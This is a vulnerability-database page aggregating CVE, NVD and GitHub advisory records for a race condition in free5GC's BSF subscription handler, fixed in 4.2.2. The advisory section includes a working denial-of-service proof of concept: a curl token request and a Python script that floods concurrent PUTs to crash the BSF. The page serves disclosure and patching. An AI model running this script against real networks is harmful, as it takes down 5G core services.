Vulnerability-Lookup

CVE-2026-44318 (GCVE-0-2026-44318)

Vulnerability from cvelistv5 – Published: 2026-05-27 15:35 – Updated: 2026-05-27 17:35

Title

free5GC: BSF concurrent PUT /nbsf-management/v1/subscriptions/{subId} crashes the BSF process via concurrent map read/write on Subscriptions

Summary

free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, free5GC's BSF PUT /nbsf-management/v1/subscriptions/{subId} handler has an unsynchronized write on the global Subscriptions map. The handler first reads the map under RLock() via BSFContext.GetSubscription(subId), but if the subscription does not exist, ReplaceIndividualSubcription() writes back to the same map directly without taking the mutex (bsfContext.BsfSelf.Subscriptions[subId] = subscription). Under concurrent authenticated PUT load, one goroutine can read while another writes the map, which causes the Go runtime to abort the process with fatal error: concurrent map read and map write (Go runtime panics that come from concurrent map access bypass recover() and terminate the process). The BSF container exits with code 2 -- the entire BSF SBI surface goes down until restart. This vulnerability is fixed in 4.2.2.

Severity

6.5 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-362 - Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')
CWE-820 - Missing Synchronization

Assigner

GitHub_M

References

4 references

URL	Tags
https://github.com/free5gc/free5gc/security/advis…	x_refsource_CONFIRM
https://github.com/free5gc/free5gc/issues/926	x_refsource_MISC
https://github.com/free5gc/bsf/pull/7	x_refsource_MISC
https://github.com/free5gc/bsf/commit/277908565fd…	x_refsource_MISC

Impacted products

1 product

Vendor	Product	Version
free5gc	free5gc	Affected: < 4.2.2

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-44318",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-05-27T17:34:59.963720Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-05-27T17:35:49.998Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/free5gc/free5gc/security/advisories/GHSA-27ph-8q4f-h7m7"
          },
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/free5gc/free5gc/issues/926"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "free5gc",
          "vendor": "free5gc",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 4.2.2"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, free5GC\u0027s BSF PUT /nbsf-management/v1/subscriptions/{subId} handler has an unsynchronized write on the global Subscriptions map. The handler first reads the map under RLock() via BSFContext.GetSubscription(subId), but if the subscription does not exist, ReplaceIndividualSubcription() writes back to the same map directly without taking the mutex (bsfContext.BsfSelf.Subscriptions[subId] = subscription). Under concurrent authenticated PUT load, one goroutine can read while another writes the map, which causes the Go runtime to abort the process with fatal error: concurrent map read and map write (Go runtime panics that come from concurrent map access bypass recover() and terminate the process). The BSF container exits with code 2 -- the entire BSF SBI surface goes down until restart. This vulnerability is fixed in 4.2.2."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-362",
              "description": "CWE-362: Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-820",
              "description": "CWE-820: Missing Synchronization",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-27T15:35:41.823Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/free5gc/free5gc/security/advisories/GHSA-27ph-8q4f-h7m7",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/free5gc/free5gc/security/advisories/GHSA-27ph-8q4f-h7m7"
        },
        {
          "name": "https://github.com/free5gc/free5gc/issues/926",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/free5gc/free5gc/issues/926"
        },
        {
          "name": "https://github.com/free5gc/bsf/pull/7",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/free5gc/bsf/pull/7"
        },
        {
          "name": "https://github.com/free5gc/bsf/commit/277908565fd628d974a13ef562b81a8b7b519ffa",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/free5gc/bsf/commit/277908565fd628d974a13ef562b81a8b7b519ffa"
        }
      ],
      "source": {
        "advisory": "GHSA-27ph-8q4f-h7m7",
        "discovery": "UNKNOWN"
      },
      "title": "free5GC: BSF concurrent PUT /nbsf-management/v1/subscriptions/{subId} crashes the BSF process via concurrent map read/write on Subscriptions"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-44318",
    "datePublished": "2026-05-27T15:35:41.823Z",
    "dateReserved": "2026-05-05T19:00:06.022Z",
    "dateUpdated": "2026-05-27T17:35:49.998Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-44318\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-27T17:16:36.887\",\"lastModified\":\"2026-05-27T18:16:23.097\",\"vulnStatus\":\"Received\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, free5GC\u0027s BSF PUT /nbsf-management/v1/subscriptions/{subId} handler has an unsynchronized write on the global Subscriptions map. The handler first reads the map under RLock() via BSFContext.GetSubscription(subId), but if the subscription does not exist, ReplaceIndividualSubcription() writes back to the same map directly without taking the mutex (bsfContext.BsfSelf.Subscriptions[subId] = subscription). Under concurrent authenticated PUT load, one goroutine can read while another writes the map, which causes the Go runtime to abort the process with fatal error: concurrent map read and map write (Go runtime panics that come from concurrent map access bypass recover() and terminate the process). The BSF container exits with code 2 -- the entire BSF SBI surface goes down until restart. This vulnerability is fixed in 4.2.2.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":6.5,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-362\"},{\"lang\":\"en\",\"value\":\"CWE-820\"}]}],\"references\":[{\"url\":\"https://github.com/free5gc/bsf/commit/277908565fd628d974a13ef562b81a8b7b519ffa\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/free5gc/bsf/pull/7\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/free5gc/free5gc/issues/926\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/free5gc/free5gc/security/advisories/GHSA-27ph-8q4f-h7m7\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/free5gc/free5gc/issues/926\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\"},{\"url\":\"https://github.com/free5gc/free5gc/security/advisories/GHSA-27ph-8q4f-h7m7\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-44318\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-05-27T17:34:59.963720Z\"}}}], \"references\": [{\"url\": \"https://github.com/free5gc/free5gc/security/advisories/GHSA-27ph-8q4f-h7m7\", \"tags\": [\"exploit\"]}, {\"url\": \"https://github.com/free5gc/free5gc/issues/926\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-05-27T17:33:10.922Z\"}}], \"cna\": {\"title\": \"free5GC: BSF concurrent PUT /nbsf-management/v1/subscriptions/{subId} crashes the BSF process via concurrent map read/write on Subscriptions\", \"source\": {\"advisory\": \"GHSA-27ph-8q4f-h7m7\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 6.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"free5gc\", \"product\": \"free5gc\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 4.2.2\"}]}], \"references\": [{\"url\": \"https://github.com/free5gc/free5gc/security/advisories/GHSA-27ph-8q4f-h7m7\", \"name\": \"https://github.com/free5gc/free5gc/security/advisories/GHSA-27ph-8q4f-h7m7\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/free5gc/free5gc/issues/926\", \"name\": \"https://github.com/free5gc/free5gc/issues/926\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/free5gc/bsf/pull/7\", \"name\": \"https://github.com/free5gc/bsf/pull/7\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/free5gc/bsf/commit/277908565fd628d974a13ef562b81a8b7b519ffa\", \"name\": \"https://github.com/free5gc/bsf/commit/277908565fd628d974a13ef562b81a8b7b519ffa\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, free5GC\u0027s BSF PUT /nbsf-management/v1/subscriptions/{subId} handler has an unsynchronized write on the global Subscriptions map. The handler first reads the map under RLock() via BSFContext.GetSubscription(subId), but if the subscription does not exist, ReplaceIndividualSubcription() writes back to the same map directly without taking the mutex (bsfContext.BsfSelf.Subscriptions[subId] = subscription). Under concurrent authenticated PUT load, one goroutine can read while another writes the map, which causes the Go runtime to abort the process with fatal error: concurrent map read and map write (Go runtime panics that come from concurrent map access bypass recover() and terminate the process). The BSF container exits with code 2 -- the entire BSF SBI surface goes down until restart. This vulnerability is fixed in 4.2.2.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-362\", \"description\": \"CWE-362: Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-820\", \"description\": \"CWE-820: Missing Synchronization\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-05-27T15:35:41.823Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-44318\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-05-27T17:35:49.998Z\", \"dateReserved\": \"2026-05-05T19:00:06.022Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-05-27T15:35:41.823Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-44318

Vulnerability from fkie_nvd - Published: 2026-05-27 17:16 - Updated: 2026-05-27 17:16

Severity

6.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/free5gc/bsf/commit/277908565fd628d974a13ef562b81a8b7b519ffa
	security-advisories@github.com	https://github.com/free5gc/bsf/pull/7
	security-advisories@github.com	https://github.com/free5gc/free5gc/issues/926
	security-advisories@github.com	https://github.com/free5gc/free5gc/security/advisories/GHSA-27ph-8q4f-h7m7

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, free5GC\u0027s BSF PUT /nbsf-management/v1/subscriptions/{subId} handler has an unsynchronized write on the global Subscriptions map. The handler first reads the map under RLock() via BSFContext.GetSubscription(subId), but if the subscription does not exist, ReplaceIndividualSubcription() writes back to the same map directly without taking the mutex (bsfContext.BsfSelf.Subscriptions[subId] = subscription). Under concurrent authenticated PUT load, one goroutine can read while another writes the map, which causes the Go runtime to abort the process with fatal error: concurrent map read and map write (Go runtime panics that come from concurrent map access bypass recover() and terminate the process). The BSF container exits with code 2 -- the entire BSF SBI surface goes down until restart. This vulnerability is fixed in 4.2.2."
    }
  ],
  "id": "CVE-2026-44318",
  "lastModified": "2026-05-27T17:16:36.887",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 6.5,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 3.6,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-05-27T17:16:36.887",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/free5gc/bsf/commit/277908565fd628d974a13ef562b81a8b7b519ffa"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/free5gc/bsf/pull/7"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/free5gc/free5gc/issues/926"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/free5gc/free5gc/security/advisories/GHSA-27ph-8q4f-h7m7"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Received",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-362"
        },
        {
          "lang": "en",
          "value": "CWE-820"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-27PH-8Q4F-H7M7

Vulnerability from github – Published: 2026-05-08 22:41 – Updated: 2026-05-08 22:41

Summary

free5GC's BSF concurrent PUT /nbsf-management/v1/subscriptions/{subId} crashes the BSF process via concurrent map read/write on Subscriptions

Details

Summary

free5GC's BSF PUT /nbsf-management/v1/subscriptions/{subId} handler has an unsynchronized write on the global Subscriptions map. The handler first reads the map under RLock() via BSFContext.GetSubscription(subId), but if the subscription does not exist, ReplaceIndividualSubcription() writes back to the same map directly without taking the mutex (bsfContext.BsfSelf.Subscriptions[subId] = subscription). Under concurrent authenticated PUT load, one goroutine can read while another writes the map, which causes the Go runtime to abort the process with fatal error: concurrent map read and map write (Go runtime panics that come from concurrent map access bypass recover() and terminate the process). The BSF container exits with code 2 -- the entire BSF SBI surface goes down until restart.

This endpoint requires a valid nbsf-management OAuth2 access token (PR:L, NOT PR:N), so this is scored as an authenticated process-kill DoS.

Details

Validated against the BSF container in the official Docker compose lab. - Source repo tag: v4.2.1 - Running Docker image: free5gc/bsf:v4.2.1 - Docker validation date: 2026-03-22 - BSF endpoint: http://10.100.200.11:8000

Read side (locked):

func (c *BSFContext) GetSubscription(subId string) (*BsfSubscription, bool) {
    c.mutex.RLock()
    defer c.mutex.RUnlock()

    sub, exists := c.Subscriptions[subId]
    return sub, exists
}

Unsafe write side in the create-if-absent branch of ReplaceIndividualSubcription (no Lock()):

subscription.SubId = subId
bsfContext.BsfSelf.Subscriptions[subId] = subscription

Under concurrent traffic, the Go runtime detects the unsynchronized read/write on c.Subscriptions and aborts the process. Go's concurrent map read and map write fatal is NOT a normal panic -- it is unrecoverable, Gin's recovery middleware does not catch it, and the BSF process terminates.

Code evidence (paths in free5gc/bsf): - Read side (locked): - NFs/bsf/internal/sbi/processor/subscriptions.go:81 - NFs/bsf/internal/context/context.go:726 - NFs/bsf/internal/context/context.go:730 - Unsafe write side (the create-if-absent branch in PUT, no lock): - NFs/bsf/internal/sbi/processor/subscriptions.go:111 - NFs/bsf/internal/sbi/processor/subscriptions.go:114

The normal locked helpers (CreateSubscription(), GetSubscription(), UpdateSubscription(), DeleteSubscription()) DO take the mutex correctly. The bug is specific to the inline write inside the PUT create-if-absent branch.

PoC

Reproduced end-to-end against the running BSF at http://10.100.200.11:8000.

Obtain a valid nbsf-management token from NRF:

curl -sS -X POST 'http://10.100.200.3:8000/oauth2/token' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data 'grant_type=client_credentials&nfType=NEF&nfInstanceId=eb9990de-4cd3-41b0-b5d9-c2102b088c57&targetNfType=BSF&scope=nbsf-management'

Send concurrent PUT requests against fresh subId values (the validated lab uses 64 worker threads x 50 fresh subIds = 3200 concurrent PUTs):

import json, threading, urllib.request

TOKEN = "<valid_nbsf_management_jwt>"
BASE = "http://10.100.200.11:8000/nbsf-management/v1"
PAYLOAD = json.dumps({
    "events": ["PCF_BINDING_CREATION"],
    "notifUri": "http://127.0.0.1/cb",
    "notifCorreId": "1",
    "supi": "imsi-208930000000003",
}).encode()

def send_put(i, n):
    url = f"{BASE}/subscriptions/race-mix-{i}-{n}"
    req = urllib.request.Request(url, data=PAYLOAD, method="PUT")
    req.add_header("Authorization", f"Bearer {TOKEN}")
    req.add_header("Content-Type", "application/json")
    urllib.request.urlopen(req, timeout=2).read()

threads = []
for i in range(64):
    for n in range(50):
        threads.append(threading.Thread(target=send_put, args=(i, n)))
for t in threads: t.start()
for t in threads: t.join()

BSF container logs (docker logs bsf) show the Go runtime fatal that terminated the process:

[INFO][BSF][Proc] Handle ReplaceIndividualSubcription
fatal error: concurrent map read and map write
github.com/free5gc/bsf/internal/sbi/processor.ReplaceIndividualSubcription(0xc000514300)
    github.com/free5gc/bsf/internal/sbi/processor/subscriptions.go:81 +0x15f

Container state confirms exit code 2:

exited|2|0

Impact

Unsynchronized concurrent access (CWE-362) to a shared map (BsfSelf.Subscriptions), combined with missing synchronization on the create-if-absent branch (CWE-820). Go's runtime detects concurrent map read/write and terminates the process via a non-recoverable fatal error -- Gin's recover() middleware does NOT catch this class of fatal, unlike ordinary nil-deref panics. The whole BSF process exits, dropping BSF's nbsf-management SBI surface (PCF binding lookups for SMF, AF -> PCF binding discovery, etc.) until restart.

Any party that holds (or can obtain) a valid nbsf-management token can: - Drive the create-if-absent code path at high concurrency by PUTting a stream of fresh subId values, deterministically tripping the runtime fatal and killing the BSF process. - Repeat the trigger after every restart to sustain the outage.

No Confidentiality impact (the crash returns no attacker-readable data). No persistent Integrity impact (BSF subscription state is in-memory and is lost when the process dies). The whole impact concentrates in Availability: complete loss of BSF service via concurrent attacker traffic on a single endpoint.

Affected: free5gc v4.2.1.

Upstream issue: https://github.com/free5gc/free5gc/issues/926 Upstream fix: https://github.com/free5gc/bsf/pull/7

Severity

6.5 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/free5gc/bsf"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.0.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44318"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-362",
      "CWE-820"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-08T22:41:48Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\nfree5GC\u0027s BSF `PUT /nbsf-management/v1/subscriptions/{subId}` handler has an unsynchronized write on the global `Subscriptions` map. The handler first reads the map under `RLock()` via `BSFContext.GetSubscription(subId)`, but if the subscription does not exist, `ReplaceIndividualSubcription()` writes back to the same map directly without taking the mutex (`bsfContext.BsfSelf.Subscriptions[subId] = subscription`). Under concurrent authenticated PUT load, one goroutine can read while another writes the map, which causes the Go runtime to abort the process with `fatal error: concurrent map read and map write` (Go runtime panics that come from concurrent map access bypass `recover()` and terminate the process). The BSF container exits with code `2` -- the entire BSF SBI surface goes down until restart.\n\nThis endpoint requires a valid `nbsf-management` OAuth2 access token (PR:L, NOT PR:N), so this is scored as an authenticated process-kill DoS.\n\n### Details\nValidated against the BSF container in the official Docker compose lab.\n- Source repo tag: `v4.2.1`\n- Running Docker image: `free5gc/bsf:v4.2.1`\n- Docker validation date: 2026-03-22\n- BSF endpoint: `http://10.100.200.11:8000`\n\nRead side (locked):\n```go\nfunc (c *BSFContext) GetSubscription(subId string) (*BsfSubscription, bool) {\n    c.mutex.RLock()\n    defer c.mutex.RUnlock()\n\n    sub, exists := c.Subscriptions[subId]\n    return sub, exists\n}\n```\n\nUnsafe write side in the create-if-absent branch of `ReplaceIndividualSubcription` (no `Lock()`):\n```go\nsubscription.SubId = subId\nbsfContext.BsfSelf.Subscriptions[subId] = subscription\n```\n\nUnder concurrent traffic, the Go runtime detects the unsynchronized read/write on `c.Subscriptions` and aborts the process. Go\u0027s `concurrent map read and map write` fatal is NOT a normal panic -- it is unrecoverable, Gin\u0027s recovery middleware does not catch it, and the BSF process terminates.\n\nCode evidence (paths in `free5gc/bsf`):\n- Read side (locked):\n  - `NFs/bsf/internal/sbi/processor/subscriptions.go:81`\n  - `NFs/bsf/internal/context/context.go:726`\n  - `NFs/bsf/internal/context/context.go:730`\n- Unsafe write side (the create-if-absent branch in PUT, no lock):\n  - `NFs/bsf/internal/sbi/processor/subscriptions.go:111`\n  - `NFs/bsf/internal/sbi/processor/subscriptions.go:114`\n\nThe normal locked helpers (`CreateSubscription()`, `GetSubscription()`, `UpdateSubscription()`, `DeleteSubscription()`) DO take the mutex correctly. The bug is specific to the inline write inside the PUT create-if-absent branch.\n\n### PoC\nReproduced end-to-end against the running BSF at `http://10.100.200.11:8000`.\n\n1. Obtain a valid `nbsf-management` token from NRF:\n```\ncurl -sS -X POST \u0027http://10.100.200.3:8000/oauth2/token\u0027 \\\n  -H \u0027Content-Type: application/x-www-form-urlencoded\u0027 \\\n  --data \u0027grant_type=client_credentials\u0026nfType=NEF\u0026nfInstanceId=eb9990de-4cd3-41b0-b5d9-c2102b088c57\u0026targetNfType=BSF\u0026scope=nbsf-management\u0027\n```\n\n2. Send concurrent PUT requests against fresh `subId` values (the validated lab uses 64 worker threads x 50 fresh subIds = 3200 concurrent PUTs):\n```python\nimport json, threading, urllib.request\n\nTOKEN = \"\u003cvalid_nbsf_management_jwt\u003e\"\nBASE = \"http://10.100.200.11:8000/nbsf-management/v1\"\nPAYLOAD = json.dumps({\n    \"events\": [\"PCF_BINDING_CREATION\"],\n    \"notifUri\": \"http://127.0.0.1/cb\",\n    \"notifCorreId\": \"1\",\n    \"supi\": \"imsi-208930000000003\",\n}).encode()\n\ndef send_put(i, n):\n    url = f\"{BASE}/subscriptions/race-mix-{i}-{n}\"\n    req = urllib.request.Request(url, data=PAYLOAD, method=\"PUT\")\n    req.add_header(\"Authorization\", f\"Bearer {TOKEN}\")\n    req.add_header(\"Content-Type\", \"application/json\")\n    urllib.request.urlopen(req, timeout=2).read()\n\nthreads = []\nfor i in range(64):\n    for n in range(50):\n        threads.append(threading.Thread(target=send_put, args=(i, n)))\nfor t in threads: t.start()\nfor t in threads: t.join()\n```\n\n3. BSF container logs (`docker logs bsf`) show the Go runtime fatal that terminated the process:\n```\n[INFO][BSF][Proc] Handle ReplaceIndividualSubcription\nfatal error: concurrent map read and map write\ngithub.com/free5gc/bsf/internal/sbi/processor.ReplaceIndividualSubcription(0xc000514300)\n    github.com/free5gc/bsf/internal/sbi/processor/subscriptions.go:81 +0x15f\n```\n\n4. Container state confirms exit code 2:\n```\nexited|2|0\n```\n\n### Impact\nUnsynchronized concurrent access (CWE-362) to a shared map (`BsfSelf.Subscriptions`), combined with missing synchronization on the create-if-absent branch (CWE-820). Go\u0027s runtime detects concurrent map read/write and terminates the process via a non-recoverable fatal error -- Gin\u0027s `recover()` middleware does NOT catch this class of fatal, unlike ordinary nil-deref panics. The whole BSF process exits, dropping BSF\u0027s `nbsf-management` SBI surface (PCF binding lookups for SMF, AF -\u003e PCF binding discovery, etc.) until restart.\n\nAny party that holds (or can obtain) a valid `nbsf-management` token can:\n- Drive the create-if-absent code path at high concurrency by PUTting a stream of fresh `subId` values, deterministically tripping the runtime fatal and killing the BSF process.\n- Repeat the trigger after every restart to sustain the outage.\n\nNo Confidentiality impact (the crash returns no attacker-readable data). No persistent Integrity impact (BSF subscription state is in-memory and is lost when the process dies). The whole impact concentrates in Availability: complete loss of BSF service via concurrent attacker traffic on a single endpoint.\n\nAffected: free5gc v4.2.1.\n\nUpstream issue: https://github.com/free5gc/free5gc/issues/926\nUpstream fix: https://github.com/free5gc/bsf/pull/7",
  "id": "GHSA-27ph-8q4f-h7m7",
  "modified": "2026-05-08T22:41:48Z",
  "published": "2026-05-08T22:41:48Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/free5gc/free5gc/security/advisories/GHSA-27ph-8q4f-h7m7"
    },
    {
      "type": "WEB",
      "url": "https://github.com/free5gc/free5gc/issues/926"
    },
    {
      "type": "WEB",
      "url": "https://github.com/free5gc/bsf/pull/7"
    },
    {
      "type": "WEB",
      "url": "https://github.com/free5gc/bsf/commit/277908565fd628d974a13ef562b81a8b7b519ffa"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/free5gc/free5gc"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "free5GC\u0027s BSF concurrent PUT /nbsf-management/v1/subscriptions/{subId} crashes the BSF process via concurrent map read/write on Subscriptions"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-44318 (GCVE-0-2026-44318)

FKIE_CVE-2026-44318

GHSA-27PH-8Q4F-H7M7

Summary

Details

PoC

Impact

Tags

Sightings

Nomenclature